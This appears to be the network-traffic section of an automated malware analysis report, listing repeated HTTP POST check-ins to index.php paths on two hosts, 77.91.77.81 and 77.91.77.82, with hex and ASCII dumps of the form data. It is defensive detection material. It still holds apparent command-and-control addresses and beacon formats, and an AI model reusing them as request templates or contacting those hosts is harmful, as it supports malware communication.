                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
